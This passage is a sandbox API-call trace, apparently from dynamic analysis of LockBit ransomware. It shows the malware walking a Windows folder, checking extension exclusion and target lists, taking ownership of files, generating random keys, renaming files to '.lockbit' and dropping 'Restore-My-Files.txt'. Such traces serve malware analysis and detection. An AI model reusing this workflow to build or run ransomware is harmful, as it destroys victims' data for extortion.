[0087.509] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.509] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.509] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.509] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.509] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0087.509] lstrcmpiW (lpString1="ntldr", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0087.509] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0087.509] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0087.509] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0087.509] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned 1 [0087.509] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationLeft_SelectionSubpicture.png") returned -1 [0087.509] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\") returned="" [0087.509] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png") returned=".png" [0087.509] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.509] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.509] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.509] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.509] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.509] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.509] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.509] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.509] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.510] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.510] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.510] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.510] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.510] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.510] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.510] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.510] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.510] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.510] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.510] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.510] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.510] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.510] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.510] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.510] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.510] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.510] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.510] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.510] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png.lockbit") returned 99 [0087.510] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.511] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.511] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.511] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.511] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.512] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.512] RtlFreeAnsiString (AnsiString="\\") [0087.512] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0087.512] malloc (_Size=0x200) returned 0x77d800 [0087.512] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.512] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.512] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.512] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.513] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.513] CloseHandle (hObject=0x3c4) returned 1 [0087.513] free (_Block=0x77d800) [0087.513] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0087.513] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.513] malloc (_Size=0x40068) returned 0x1fb18c0 [0087.514] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3130) returned 1 [0087.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.515] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.516] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0087.516] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.517] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0087.517] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0087.521] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.522] malloc (_Size=0xdc) returned 0x1ff1e60 [0087.522] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xdc, FileInformationClass=0xa) returned 0x0 [0087.522] free (_Block=0x1ff1e60) [0087.522] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationLeft_SelectionSubpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 1 [0087.522] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt") returned 73 [0087.522] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.523] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70007aa2, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70007aa2, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fa59b8f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0087.523] lstrcmpiW (lpString1=".", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0087.523] lstrcmpiW (lpString1="..", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0087.523] PathFindExtensionW (pszPath="NavigationRight_ButtonGraphic.png") returned=".png" [0087.523] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.524] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.524] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.524] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.524] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.524] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.524] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.524] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.524] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.524] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.524] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.524] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.525] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.525] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.525] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.525] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.525] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.525] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.526] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.526] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.526] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.526] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.526] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.526] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.526] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.526] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.526] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.526] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.526] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.526] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.526] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.526] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.526] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.526] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0087.526] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0087.526] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0087.526] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0087.526] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0087.527] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_ButtonGraphic.png") returned 1 [0087.527] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_ButtonGraphic.png") returned -1 [0087.527] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\") returned="" [0087.527] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png") returned=".png" [0087.527] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0087.527] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0087.527] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0087.527] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0087.527] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0087.527] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0087.527] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0087.527] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0087.527] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0087.527] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0087.527] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0087.527] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0087.527] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0087.527] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0087.528] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0087.528] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0087.528] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0087.528] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0087.528] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0087.528] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0087.528] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0087.528] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0087.528] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0087.528] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0087.528] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0087.528] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0087.528] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0087.528] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0087.528] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png.lockbit") returned 94 [0087.528] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.529] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0087.529] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0087.529] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0087.530] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0087.530] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0087.530] RtlFreeAnsiString (AnsiString="\\") [0087.530] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0087.530] malloc (_Size=0x200) returned 0x77d800 [0087.530] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0087.530] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.530] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0087.531] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.531] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0087.532] CloseHandle (hObject=0x3b8) returned 1 [0087.532] free (_Block=0x77d800) [0087.532] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0087.532] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0087.532] malloc (_Size=0x40068) returned 0x3d70048 [0087.533] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=5025) returned 1 [0087.533] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.534] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.534] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0087.534] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0087.534] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0087.535] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0087.535] ReadFile (in: hFile=0x3b8, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0087.545] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0087.545] malloc (_Size=0xd2) returned 0x1ff1e60 [0087.545] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xd2, FileInformationClass=0xa) returned 0x0 [0087.545] free (_Block=0x1ff1e60) [0087.546] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_ButtonGraphic.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter") returned 1 [0087.546] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt") returned 73 [0087.546] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\shatter\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0087.546] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ff9568b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ff9568b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4faf2107, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x0, dwReserved1=0x0, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0087.546] lstrcmpiW (lpString1=".", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0087.546] lstrcmpiW (lpString1="..", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0087.546] PathFindExtensionW (pszPath="NavigationRight_SelectionSubpicture.png") returned=".png" [0087.546] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0087.546] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0087.546] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0087.546] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0087.546] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0087.546] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0087.546] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0087.546] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0087.546] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0087.546] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0087.546] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0087.546] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0087.547] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0087.547] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0087.547] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0087.547] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0087.547] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0087.547] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0087.548] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0087.548] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0087.548] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0087.548] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0087.548] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0087.548] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0087.548] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0087.548] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0087.548] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0087.548] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0087.548] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0087.548] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0087.548] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0087.548] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0087.548] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0087.548] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0087.548] lstrcmpiW (lpString1="ntldr", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0087.548] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0087.548] lstrcmpiW (lpString1="bootsect.bak", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0087.548] lstrcmpiW (lpString1="autorun.inf", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0087.548] lstrcmpiW (lpString1="thumbs.db", lpString2="NavigationRight_SelectionSubpicture.png") returned 1 [0087.549] lstrcmpiW (lpString1="iconcache.db", lpString2="NavigationRight_SelectionSubpicture.png") returned -1 [0087.549] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\") returned="" [0087.549] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Shatter\\NavigationRight_SelectionSubpicture.png") 